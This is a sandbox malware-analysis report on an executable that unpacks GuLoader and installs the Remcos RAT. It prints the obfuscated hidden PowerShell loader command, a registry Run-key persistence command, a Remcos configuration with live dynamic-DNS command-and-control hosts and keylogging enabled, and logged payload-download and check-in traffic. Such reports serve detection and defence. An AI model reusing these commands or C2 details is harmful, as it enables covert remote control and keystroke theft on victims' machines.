Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
586 R1 M-LINE - GEORGIA 03.05.2024.exe

Overview

General Information

Sample name:586 R1 M-LINE - GEORGIA 03.05.2024.exe
Analysis ID:1435835
MD5:da38292df7f99c9cf99629e84d934bd6
SHA1:54ba9688e3e1159f1e1a43d1716f78a0c33665ba
SHA256:8950c80b785fe1dcff01dbb074a337102bf8c76a06314287d4686501617171f3
Tags:exeGuLoader
Infos:

Detection

GuLoader, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Obfuscated command line found
Powershell drops PE file
Sample uses process hollowing technique
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Uses cmd line tools excessively to alter registry or file data
Uses dynamic DNS services
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates processes with suspicious names
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • 586 R1 M-LINE - GEORGIA 03.05.2024.exe (PID: 6628 cmdline: "C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe" MD5: DA38292DF7F99C9CF99629E84D934BD6)
    • powershell.exe (PID: 1612 cmdline: "powershell.exe" -windowstyle hidden "$Respireredes=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Glathvls\rotorklipper\Ergotoxine\Oxaloacetic.Arc';$Brikvvningernes=$Respireredes.SubString(58067,3);.$Brikvvningernes($Respireredes)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7004 cmdline: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • wab.exe (PID: 6544 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • cmd.exe (PID: 2212 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 6732 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • wab.exe (PID: 2352 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\sreexoebkgcaarsayfwsrzyyowbcnlfz" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • WerFault.exe (PID: 2568 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 12 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • wab.exe (PID: 5852 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dtkx" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • WerFault.exe (PID: 3452 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 12 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • wab.exe (PID: 6672 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\fnphyzzx" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • WerFault.exe (PID: 2000 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6672 -s 12 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • wab.exe (PID: 5164 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xtjcxb" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • WerFault.exe (PID: 2668 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5164 -s 12 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • wab.exe (PID: 5436 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hvonqtlzm" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 2932 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\sptgqmvszidsb" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 5960 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zaaaovlz" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 2024 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\juftpowalcj" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 2084 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mxslqghuzktmmh" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 2332 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dceyoihckfacn" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 2164 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dceyoihckfacn" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 5124 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dceyoihckfacn" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 4128 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dceyoihckfacn" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • WerFault.exe (PID: 6348 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4128 -s 12 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • wab.exe (PID: 5632 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\owkrpbswynspxwny" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • WerFault.exe (PID: 6924 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5632 -s 12 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • wab.exe (PID: 6732 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yyxcqtdymwkuzcbcqpf" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • WerFault.exe (PID: 3300 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6732 -s 12 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "learfo55ozj02.duckdns.org:29871:0learfo55ozj02.duckdns.org:29872:1leirfo45ozj01.duckdns.org:29871:0", "Assigned name": "Tops", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "jmofvnb-6GMGJI", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "fvberms.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\fvberms.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000007.00000002.2877594254.0000000005567000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000007.00000003.2216916264.0000000005579000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000007.00000003.2216886592.0000000005575000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000001.00000002.2204905580.0000000009858000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Process Memory Space: wab.exe PID: 6544JoeSecurity_RemcosYara detected Remcos RATJoe Security

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 6544, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)", ProcessId: 2212, ProcessName: cmd.exe
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 6732, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Unthematic
              Sigma detected: Direct Autorun Keys Modification
              Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2212, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)", ProcessId: 6732, ProcessName: reg.exe
              Sigma detected: Potential Binary Or Script Dropper Via PowerShell
              Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1612, TargetFilename: C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Fugendes151\586 R1 M-LINE - GEORGIA 03.05.2024.exe
              Sigma detected: Potential Dosfuscation Activity
              Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", CommandLine: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "powershell.exe" -windowstyle hidden "$Respireredes=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Glathvls\rotorklipper\Ergotoxine\Oxaloacetic.Arc';$Brikvvningernes=$Respireredes.SubString(58067,3);.$Brikvvningernes($Respireredes)", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1612, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", ProcessId: 7004, ProcessName: cmd.exe
              Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 6544, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)", ProcessId: 2212, ProcessName: cmd.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Respireredes=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Glathvls\rotorklipper\Ergotoxine\Oxaloacetic.Arc';$Brikvvningernes=$Respireredes.SubString(58067,3);.$Brikvvningernes($Respireredes)", CommandLine: "powershell.exe" -windowstyle hidden "$Respireredes=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Glathvls\rotorklipper\Ergotoxine\Oxaloacetic.Arc';$Brikvvningernes=$Respireredes.SubString(58067,3);.$Brikvvningernes($Respireredes)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe", ParentImage: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe, ParentProcessId: 6628, ParentProcessName: 586 R1 M-LINE - GEORGIA 03.05.2024.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Respireredes=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Glathvls\rotorklipper\Ergotoxine\Oxaloacetic.Arc';$Brikvvningernes=$Respireredes.SubString(58067,3);.$Brikvvningernes($Respireredes)", ProcessId: 1612, ProcessName: powershell.exe

              Snort Signatures

              Timestamp:05/03/24-09:43:53.816926
              SID:2032777
              Source Port:29871
              Destination Port:49739
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/03/24-09:43:53.300767
              SID:2032776
              Source Port:49739
              Destination Port:29871
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
              Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
              Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
              Found malware configuration
              Source: 00000007.00000002.2877594254.0000000005567000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "learfo55ozj02.duckdns.org:29871:0learfo55ozj02.duckdns.org:29872:1leirfo45ozj01.duckdns.org:29871:0", "Assigned name": "Tops", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "jmofvnb-6GMGJI", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "fvberms.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Fugendes151\586 R1 M-LINE - GEORGIA 03.05.2024.exeVirustotal: Detection: 13%Perma Link
              Multi AV Scanner detection for submitted file
              Source: 586 R1 M-LINE - GEORGIA 03.05.2024.exeVirustotal: Detection: 13%Perma Link
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000007.00000002.2877594254.0000000005567000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.2216916264.0000000005579000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.2216886592.0000000005575000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 6544, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\fvberms.dat, type: DROPPED
              Source: 586 R1 M-LINE - GEORGIA 03.05.2024.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 172.67.215.46:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: 586 R1 M-LINE - GEORGIA 03.05.2024.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: .pdb9 source: powershell.exe, 00000001.00000002.2204647066.000000000845C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbc source: powershell.exe, 00000001.00000002.2204293333.00000000083AA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000001.00000002.2200456150.00000000071E8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb55%y source: powershell.exe, 00000001.00000002.2200456150.00000000071E8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.2204293333.00000000083AA000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeCode function: 0_2_004069DF FindFirstFileW,FindClose,0_2_004069DF
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeCode function: 0_2_00405D8E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D8E
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\brosy\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\brosy\udrulnings\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior

              Networking

              barindex
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.4:49739 -> 193.222.96.21:29871
              Source: TrafficSnort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 193.222.96.21:29871 -> 192.168.2.4:49739
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: learfo55ozj02.duckdns.org
              Connects to many ports of the same IP (likely port scanning)
              Source: global trafficTCP traffic: 193.222.96.21 ports 29871,1,2,7,8,9
              Uses dynamic DNS services
              Source: unknownDNS query: name: learfo55ozj02.duckdns.org
              Source: global trafficTCP traffic: 192.168.2.4:49739 -> 193.222.96.21:29871
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewIP Address: 193.222.96.21 193.222.96.21
              Source: Joe Sandbox ViewASN Name: SWISSCOMSwisscomSwitzerlandLtdCH SWISSCOMSwisscomSwitzerlandLtdCH
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global trafficHTTP traffic detected: GET /XpMumnKrmZynRk242.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: enelltd.topCache-Control: no-cache
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /XpMumnKrmZynRk242.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: enelltd.topCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: enelltd.top
              Source: global trafficDNS traffic detected: DNS query: learfo55ozj02.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: powershell.exe, 00000001.00000002.2193750847.0000000000B2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: wab.exe, 00000007.00000003.2216916264.0000000005579000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2216886592.0000000005575000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
              Source: wab.exe, 00000007.00000002.2877594254.0000000005567000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2216916264.0000000005579000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2877594254.000000000550B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2216886592.0000000005575000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: wab.exe, 00000007.00000002.2877594254.0000000005567000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2216916264.0000000005579000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2216886592.0000000005575000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpf
              Source: wab.exe, 00000007.00000002.2877594254.0000000005567000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2216916264.0000000005579000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2216886592.0000000005575000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpm
              Source: 586 R1 M-LINE - GEORGIA 03.05.2024.exe, 586 R1 M-LINE - GEORGIA 03.05.2024.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: powershell.exe, 00000001.00000002.2196989901.0000000005AF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000001.00000002.2194433332.0000000004BE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: 586 R1 M-LINE - GEORGIA 03.05.2024.exe, 586 R1 M-LINE - GEORGIA 03.05.2024.exe.1.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: 586 R1 M-LINE - GEORGIA 03.05.2024.exe, 586 R1 M-LINE - GEORGIA 03.05.2024.exe.1.drString found in binary or memory: http://s.symcd.com06
